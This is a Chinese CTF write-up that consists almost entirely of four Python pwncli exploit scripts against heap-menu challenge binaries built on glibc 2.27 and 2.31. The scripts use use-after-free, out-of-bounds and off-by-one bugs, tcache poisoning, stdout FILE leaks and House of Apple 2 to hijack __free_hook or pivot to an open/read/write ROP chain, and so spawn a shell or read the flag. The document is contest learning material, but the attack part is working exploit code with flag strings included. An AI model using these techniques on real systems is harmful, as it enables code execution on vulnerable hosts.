sh_v1.1_exp_cli.py
#!/usr/bin/env python3
# Link: https://github.com/RoderickChan/pwncli
# Usage:
# Debug : python3 exp.py debug elf-file-path -t -b malloc
# Remote: python3 exp.py remote elf-file-path ip:port
# flag{love-life-love-freedom-d23s}
from pwncli import *
# pwncli entry point: per the usage header it parses argv (debug/remote,
# ELF path, ip:port) and fills the global `gift` with the connection and binaries.
cli_script()
io: tube = gift.io  # process or remote socket, depending on the mode chosen on the CLI
elf: ELF = gift.elf
# libc that symbol lookups (libc.sym.*) below resolve against; every hard-coded
# offset in this script is tied to that exact build.
libc: ELF = gift.libc
# one_gadgets: list = get_current_one_gadget_from_libc(more=False)
# CurrentGadgets.set_find_area(find_in_elf=True, find_in_libc=False, do_initial=False)
"""
0: status
8: filename
------------
ls file:
status == 1: print
cat file:
status == 1: puts filecontent
touch file:
status == 0:
status = 1
filecontent = malloc(0x208)
strcpy(filename, xxx)
read()
cp file1 file2:
file1 == file[0].filename:
fine file2:
strncpy(file2, file[0], 0x208)
else:
find files[n].status == 0
files[n].status = 1
files[n].filename = file2
strncpy(file2, file[0], 0x208)
gedit file:
find filename
file.status == 1:
read(filecontent, 0x200)
rm file:
free(files[n])
files[n] = 0
ln target linkname:
find file:
find status==0:
strcpy(filename, linkname)
status = 1
linkname = target.content
"""
def cmd(i):
    """Send the shell command *i* once the target shows its ``>>>>`` prompt."""
    prompt = ">>>>"
    sla(prompt, i)
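def touch(filename, data="deadbeef", sendline=True):
    """``touch <filename>``: create a file and write *data* into its content buffer.

    The listing had lost the f-string placeholder (``'touch (unknown)'``), so
    every call would have created a file literally named ``(unknown)`` and the
    *filename* argument was ignored; the name is now interpolated the same way
    the ``ln`` helper does.  With *sendline* a newline is sent after *data*
    (the ``\\n`` escape had been garbled to ``"n"``).
    """
    cmd(f'touch {filename}')
    s(data)
    if sendline:
        s("\n")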
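def gedit(filename, data, sendline=True):
    """``gedit <filename>``: overwrite the content of an existing file with *data*.

    Fixes the same two listing defects as ``touch``: the command string had no
    ``{filename}`` placeholder (so the argument was silently ignored) and the
    trailing newline escape was garbled.  Used below to write a tcache ``fd``
    through a dangling link, so *data* is usually a raw ``p64`` value.
    """
    cmd(f'gedit {filename}')
    s(data)
    if sendline:
        s("\n")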
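def cat(filename):
    """``cat <filename>``: make the target print the file's content.

    The f-string placeholder was missing in the listing (``'cat (unknown)'``);
    restored so the requested file is actually read.
    """
    cmd(f'cat {filename}')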
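def rm(filename):
    """``rm <filename>``: delete the file (per the notes above, ``free``s its buffer).

    The f-string placeholder was missing in the listing (``'rm (unknown)'``);
    restored so the requested file is the one freed.
    """
    cmd(f'rm {filename}')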
def ln(target, linkname):
    """``ln <target> <linkname>``: create *linkname* sharing *target*'s content pointer."""
    command = f'ln {target} {linkname}'
    cmd(command)
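# ---- Stage 1: libc leak through a link whose target has been freed ----
for i in range(8):
    touch(f"file{i}")
# link0 shares file0's content pointer (see the notes: linkname = target.content).
ln("file0", "link0")
# Content buffers are malloc(0x208) -> 0x210 chunks. Seven frees fill the
# tcache bin; the eighth (file0) is too big for a fastbin and goes to the
# unsorted bin, leaving main_arena+96 in its fd.
for i in range(7):
    rm(f"file{i + 1}")
rm("file0")
# link0 still points at the freed buffer: reading it prints the arena pointer.
cat("link0")
main_arena_addr = recv_current_libc_addr() - 96
leak("main_arena_addr", main_arena_addr)
S()  # pause for the debugger in debug mode
# 0x1ebb80 is the main_arena offset for the author's libc (a glibc 2.31
# Ubuntu build); recheck it against the libc shipped with the challenge.
set_current_libc_base_and_log(main_arena_addr, 0x1ebb80)

# ---- Stage 2: tcache poisoning through the same dangling link ----
for i in range(8):
    touch(f"file{i}")
rm("file6")
rm("file7")
# link0 now aliases one of the freed 0x210 chunks; rewrite its tcache fd so
# the second allocation from that bin lands on __free_hook-8.
gedit("link0", p64(libc.sym.__free_hook - 8))
S()
touch("file8")
# "/bin/sh\0" sits at __free_hook-8 and system() lands in the hook itself.
# (The literal had been garbled to "/bin/shx00"; NUL escape restored.)
touch("file9", flat("/bin/sh\x00", libc.sym.system))
# free(file9's buffer) -> __free_hook(ptr) == system("/bin/sh").
# __free_hook only exists up to glibc 2.33, so this chain is tied to the 2.31 target.
rm("file9")
ia()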
three_edit_exp_cli.py
#!/usr/bin/env python3
# Link: https://github.com/RoderickChan/pwncli
# Usage:
# Debug : python3 exp.py debug elf-file-path -t -b malloc
# Remote: python3 exp.py remote elf-file-path ip:port
# flag{12awxvpjsd-21aqxw-a3daxdlpsd-987@376hnb}
from pwncli import *
# pwncli entry point: per the usage header it parses argv (debug/remote,
# ELF path, ip:port) and fills the global `gift`.
cli_script()
# Hard-coded offsets below (0x46a0, 0x1eb980) are only valid for this exact libc build.
set_remote_libc('libc-2.31.so')
io: tube = gift.io  # process or remote socket, depending on the CLI mode
elf: ELF = gift.elf
libc: ELF = gift.libc  # symbol source for libc.sym.* lookups
def cmd(i):
    """Choose menu entry *i* after the prompt ending in ``is:`` has been received."""
    menu_prompt = "is:"
    sla(menu_prompt, i)
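def add(i, sz, data="deadbeef", sendline=True):
    """Menu 1: allocate slot *i* with *sz* bytes and fill it with *data*.

    *sendline* selects ``sendlineafter`` (appends ``\\n``) versus a raw
    ``sendafter``; use the latter for payloads that must not end in a newline.
    The prompt anchors had their ``\\n`` escapes stripped in the listing
    (``"index:n"`` etc.); they are restored here.
    """
    cmd('1')
    sla("index:\n", str(i))
    sla("size:\n", str(sz))
    if sendline:
        sla("content:\n", data)
    else:
        sa("content:\n", data)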
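def dele(i):
    """Menu 2: free slot *i* (prompt anchor ``"index?\\n"`` restored from the garbled listing)."""
    cmd('2')
    sla("index?\n", str(i))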
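def edit(i, data, sendline=True):
    """Menu 3: overwrite slot *i* with *data*.

    The index is passed straight through, and the exploit below relies on the
    target not bounds-checking it (negative indices reach memory before the
    slot table).  *sendline* picks ``sendlineafter`` versus raw ``sendafter``;
    the two anchors differ only in how much of the prompt they match.
    Newline escapes were garbled in the listing and are restored.
    """
    cmd('3')
    sla("index?\n", str(i))
    if sendline:
        sla("content:\n", data)
    else:
        sa("new content:\n", data)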
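# Slot 0 carries a fake chunk header (size 0x71) at offset 0x40 of its data,
# to be reached later through an overlapping/partial-overwrite allocation.
add(0, 0x51, flat({0x40: [0, 0x71]}))
add(1, 0x50)
add(2, 0x50)
for i in range(9):
    add(i + 3, 0x70)
# add(12, 0x50)
dele(0)
dele(2)
S(0)
# Out-of-bounds edit (negative slot index): rewrite the low byte of a pointer
# stored before the slot table.  The listing had "xf0"; a three-character
# string makes no sense for a one-byte partial overwrite, so \xf0 is restored.
edit(-0x3e, "\xf0")
for i in range(7):  # fill the 0x80 tcache bin
    dele(9 - i)
S(0)
add(3, 0x50)
add(4, 0x50, flat(0, 0x441))  # forge a 0x441 size field for the next free
S(0)
dele(1)
S(0)
add(0, 0x50)
add(1, 0x50)
# Two-byte partial overwrite of a tcache fd toward _IO_2_1_stdout_.  Only the
# low 16 bits are written, and 4 of those bits are ASLR-randomised, so the
# remote constant 0x46a0 is a 1-in-16 guess: run this in a retry loop against
# the real target.  Locally the true value is computed from the known base.
if gift.remote:
    off = 0x46a0
else:
    off = (gift._libc_base + libc.sym._IO_2_1_stdout_) & 0xffff
S()
edit(-0x3c, p16(off))
S()
add(5, 0x70)
S()
# This allocation lands on stdout: _flags = 0xfbad1887 and zeroed
# _IO_read_* make the next flush print libc memory (NUL escape restored).
add(6, 0x70, flat(0xfbad1887, 0, 0, 0, "\x00"))
libcaddr = recv_current_libc_addr()
leak("libcaddr", libcaddr)
# 0x1eb980: offset of the pointer the stdout leak yields first, for the
# author's libc-2.31 build -- recheck against the shipped libc.
set_current_libc_base_and_log(libcaddr, 0x1eb980)
dele(1)
dele(0)
dele(4)
# Overlapping chunk: forge a 0x61 header whose tcache fd is __free_hook-8.
add(0, 0x60, flat(0, 0x61, libc.sym.__free_hook - 8))
add(1, 0x50)
# Second allocation from that bin is __free_hook-8: "/bin/sh\0" then system().
# __free_hook is gone in glibc >= 2.34, so the chain is tied to 2.31.
add(4, 0x50, flat("/bin/sh\x00", libc.sym.system))
dele(4)  # free(__free_hook-8) -> system("/bin/sh")
ia()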
tototo_exp_cli.py
#!/usr/bin/env python3
# Link: https://github.com/RoderickChan/pwncli
# Usage:
# Debug : python3 exp.py debug elf-file-path -t -b malloc
# Remote: python3 exp.py remote elf-file-path ip:port
# flag{1sddeasd-2axxxedw-a3dd23fdasd-a346gasdw}
from pwncli import *
# pwncli entry point: per the usage header it parses argv (debug/remote,
# ELF path, ip:port) and fills the global `gift`.
cli_script()
# Offsets below (0x1ebbe0, 0x1ebfd0) are specific to this libc build.
set_remote_libc('libc-2.31.so')
io: tube = gift.io  # process or remote socket, depending on the CLI mode
elf: ELF = gift.elf
libc: ELF = gift.libc  # symbol source for libc.sym.* lookups
# one_gadgets: list = get_current_one_gadget_from_libc(more=False)
# Gadget search restricted to libc (the ORW chain and leave/ret below come from it);
# do_initial=False defers the search until the libc base is known.
CurrentGadgets.set_find_area(find_in_elf=0, find_in_libc=1, do_initial=False)
def cmd(i):
    """Pick menu entry *i* once the prompt ending in ``is:`` arrives."""
    anchor = "is:"
    sla(anchor, i)
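def add(i, sz):  # size range accepted by the target: 0x200-0x800 (author's note)
    """Menu 1: allocate slot *i* with *sz* bytes (no content is written here).

    Prompt anchors had their ``\\n`` escapes stripped in the listing; restored.
    """
    cmd('1')
    sla("index?\n", str(i))
    sla("size?\n", str(sz))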
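def add2(i, sz):  # size range accepted by the target: 0x200-0x800 (author's note)
    """Menu 5: second allocation primitive with the same prompts as ``add``.

    Defined but unused in this script.  Newline escapes restored.
    """
    cmd('5')
    sla("index?\n", str(i))
    sla("size?\n", str(sz))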
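def edit(i, data, sendline=True):
    """Menu 3: write *data* into slot *i*.

    The exploit edits slots after they were freed, so the target evidently
    does not clear or validate the pointer (use-after-free write).
    *sendline* picks ``sendlineafter`` versus raw ``sendafter``.
    Newline escapes in the prompt anchors were garbled in the listing; restored.
    """
    cmd('3')
    sla("Which one?\n", str(i))
    if sendline:
        sla("new content?\n", data)
    else:
        sa("new content?\n", data)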
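def show(i):
    """Menu 4: print slot *i* (called on freed slots below: use-after-free read).

    Newline escape in the prompt anchor restored.
    """
    cmd('4')
    sla("Which one?\n", str(i))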
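def dele(i):
    """Menu 2: free slot *i* (newline escape in the prompt anchor restored)."""
    cmd('2')
    sla("Which one?\n", str(i))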
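add(2, 0x420)
add(0, 0x200)
add(1, 0x200)
add(7, 0x800)
dele(7)
add(8, 0x200)
add(3, 0x410)
add(4, 0x200)
# Heap leak: free two 0x210 chunks and read the second one's tcache fd.
dele(0)
dele(1)
show(1)
heapaddr = u64_ex(rn(6))
leak("heapaddr", heapaddr)
# libc leak: the 0x430 chunk goes to the unsorted bin, fd points into main_arena.
dele(2)
show(2)
libcaddr = u64_ex(rn(6))
leak("libcaddr", libcaddr)
# 0x1ebbe0 is the offset of that arena pointer in the author's libc-2.31 build.
lb = set_current_libc_base_and_log(libcaddr, 0x1ebbe0)
add(5, 0x600)
# Largebin-attack style write through the freed chunk 2: fd back into the
# arena's bin list (main_arena+0x450 in this build) and bk_nextsize set to
# _IO_list_all-0x20, so sorting the next chunk stores a heap pointer into
# _IO_list_all.  The payload is written minus its first byte ([1:]); this is
# the author's alignment for this target's edit -- verify in a debugger.
edit(2, flat(lb + 0x1ebfd0, 0, libc.sym._IO_list_all - 0x20)[1:])
dele(3)
add(6, 0x600)
# House of Apple 2: a fake FILE whose vtable is _IO_wfile_jumps; when the
# FILE list is walked (exit / flush) the handler pivots the stack onto the
# heap and runs the ROP chain below.
fff = IO_FILE_plus_struct()
payload = fff.house_of_apple2_stack_pivoting_when_do_IO_operation(
    standard_FILE_addr=heapaddr + 0x620,
    _IO_wfile_jumps_addr=libc.sym._IO_wfile_jumps,
    leave_ret_addr=CurrentGadgets.leave_ret(),
    pop_rbp_addr=CurrentGadgets.pop_rbp_ret(),
    fake_rbp_addr=heapaddr + 0x430 + 0x8,
)
# Open/read/write chain for flag.txt rather than system(): presumably the
# target is sandboxed (seccomp) -- confirm.  ljust's fill character must be
# a single char, so the garbled "x00" (a TypeError) is restored to "\x00".
edit(7, flat({
    0x200 - 9: payload,
    0x7: [
        "flag.txt".ljust(0x10, "\x00"),
        CurrentGadgets.orw_chain(heapaddr + 0x430, heapaddr),
    ],
}, filler="\x00"))
edit(4, "\x00")
# Author's comment says this triggers "exit 0", but '3' is also the edit
# option used above; check the menu before relying on it.
cmd('3')
ia()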
ttsc_exp_cli.py
#!/usr/bin/env python3
# Link: https://github.com/RoderickChan/pwncli
# Usage:
# Debug : python3 exp.py debug elf-file-path -t -b malloc
# Remote: python3 exp.py remote elf-file-path ip:port
# flag{12sd22222s-213edw-a3aaazcd-ad213dasd2sdw}
from pwncli import *
# pwncli entry point: per the usage header it parses argv (debug/remote,
# ELF path, ip:port) and fills the global `gift`.
cli_script()
# glibc 2.27 target: tcache has no double-free / size checks here, which the
# size-forging below depends on.  Offsets (0x3ed8b0, +131) are for this build only.
set_remote_libc('libc-2.27.so')
io: tube = gift.io  # process or remote socket, depending on the CLI mode
elf: ELF = gift.elf
libc: ELF = gift.libc  # symbol source for libc.sym.* lookups
# one_gadgets: list = get_current_one_gadget_from_libc(more=False)
# CurrentGadgets.set_find_area(find_in_elf=True, find_in_libc=False, do_initial=False)
def cmd(i):
    """Select menu entry *i* after the prompt ending in ``chs:`` is seen."""
    choice_prompt = "chs:"
    sla(choice_prompt, i)
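def add(i, sz, data="deadbeef"):
    """Menu 1: allocate slot *i* with *sz* bytes and send *data* as content.

    There is apparently no prompt to anchor the content write on, so the
    author sleeps 100 ms before sending; on a slow link that is a race -- if
    the target prints anything before reading, anchor with ``sa`` instead.
    Newline escapes in the prompt anchors were garbled in the listing; restored.
    """
    cmd('1')
    sla("index?\n", str(i))
    sla("size:\n", str(sz))
    sleep(0.1)
    s(data)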
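def dele(i):
    """Menu 2: free slot *i* (newline escape in the prompt anchor restored)."""
    cmd('2')
    sla("index?\n", str(i))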
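def edit(i, data):
    """Menu 3: overwrite slot *i* with *data* (raw send after the ``content:`` prompt).

    No newline is appended, so callers add ``"\\n"`` themselves when the
    target reads a line.  Newline escape in the index prompt restored.
    """
    cmd('3')
    sla("index?\n", str(i))
    sa("content:", data)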
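# Greeting: the name echo leaks a stack pointer.  recv_current_libc_addr()
# just grabs the next 0x7f-prefixed 6-byte value, so "stackleak" is whatever
# stack address comes back first -- verify which one in gdb.
# (Newline escapes in all prompt anchors were garbled in the listing; restored.)
sa("what is your name?\n", "roderick" * 2)
sla("age?\n", str(18))
sla("high?\n", str(18))
stackleak = recv_current_libc_addr()
leak("stack address", stackleak)
# Author's notes (translated):
# 1. Write down what you already control: bugs, read/write primitives.  If the
#    next step seems impossible, you have most likely missed a bug.
# 2. Write the exploit path down, from the read to the write.
# Plan: route a tcache fd through the stack to land an allocation on stdout.
# array size: 4 (the slot table only holds four entries)
add(0, 0x18)
add(1, 0x28)
add(2, 0x78, flat(0, 0, 0, 0x21))
add(3, 0x78)  # tcache_count (author's label)
# Off-by-one from slot 0 into slot 1's size byte: 0x31 -> 0x51 ("x51" restored to \x51).
edit(0, flat({0x18: "\x51"}))
dele(1)
dele(3)
dele(2)
# Reallocate the enlarged slot 1; its tail overlaps slot 2's header, so forge
# size 0x31 there and point slot 2's tcache fd at the stack.
add(1, 0x40, flat({0x20: [0, 0x31, stackleak - 0x28b8]}))
S(0)
add(2, 0x78)
add(3, 0x78)  # served from the stack address above (2.27 tcache does no size check)
S(0)
dele(0)  # free the index only; the table has four slots
# The next 0x80 allocation follows the fd read from that stack slot, which
# (per the author's plan) holds a pointer to stdout: set _flags=0xfbad1887
# and zero _IO_read_* so the next flush prints libc memory (NUL restored).
add(0, 0x78, flat(0xfbad1887, 0, 0, 0, "\x00"))
libcaddr = recv_current_libc_addr()
leak("libcaddr", libcaddr)
# 0x3ed8b0: offset of the pointer that flush leaks first, for the author's
# libc-2.27 build -- recheck against the shipped libc.
lb = set_current_libc_base_and_log(libcaddr, 0x3ed8b0)
S(0)
# Slot 0 *is* _IO_2_1_stdout_ now, so every edit(0, ...) rewrites the FILE.
# First give it sane buffer pointers (stdout+131 is the one-byte in-struct
# buffer) and set _fileno to 2, so later output goes out via stderr -- which
# is why the final command redirects with >&2.
edit(0, flat(0xfbad1887, 0,
             0, 0,
             libc.sym._IO_2_1_stdout_ + 131, libc.sym._IO_2_1_stdout_ + 131,
             libc.sym._IO_2_1_stdout_ + 131, libc.sym._IO_2_1_stdout_ + 131,
             libc.sym._IO_2_1_stdout_ + 131 + 1, 0, 0, 0, 0, 0, 2, "\n"))
leakaddr = stackleak + 0x20
# tcache->key = 0 (author's note)
# _IO_write_base=leakaddr, _IO_write_ptr=leakaddr+8: the flush prints those
# 8 stack bytes, a return address into the PIE binary.
edit(0, flat(0xfbad1887, leakaddr,
             leakaddr, leakaddr,
             leakaddr, leakaddr + 8,
             leakaddr + 8, leakaddr,
             libc.sym._IO_2_1_stdout_ + 131 + 8, 0, 0, 0, 0, 0, 2, "\n"))
codeaddr = u64(rn(8))
leak("codeaddr", codeaddr)
codebase = codeaddr - 0x1080  # return-address offset in the author's build
dele(2)  # slot 2 now carries the forged 0x31 size -> 0x30 tcache bin
# Slot 1 still overlaps slot 2's header (fd at data+0x30): point the 0x30
# tcache entry at the binary's slot table (0x202080 in .bss, presumably).
edit(1, flat({0x30: codebase + 0x202080}) + b"\n")
dele(1)
add(1, 0x20)
# This allocation is the slot table itself: slot 0 now points at __free_hook-8.
add(2, 0x20, p64(libc.sym.__free_hook - 8))
# "/bin/sh\0" at __free_hook-8 and system() in the hook; freeing slot 0 calls
# system("/bin/sh").  (__free_hook exists only up to glibc 2.33.)
edit(0, flat("/bin/sh\x00", libc.sym.system, "\n"))
dele(0)
sl("cat flag* >&2")  # stdout's fd was switched to 2 above
ia()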
题目附件下载地址请后台回复:pwnhub03internal
原文始发于微信公众号(Arr3stY0u):【pwn专场】pwnhub内部赛writeup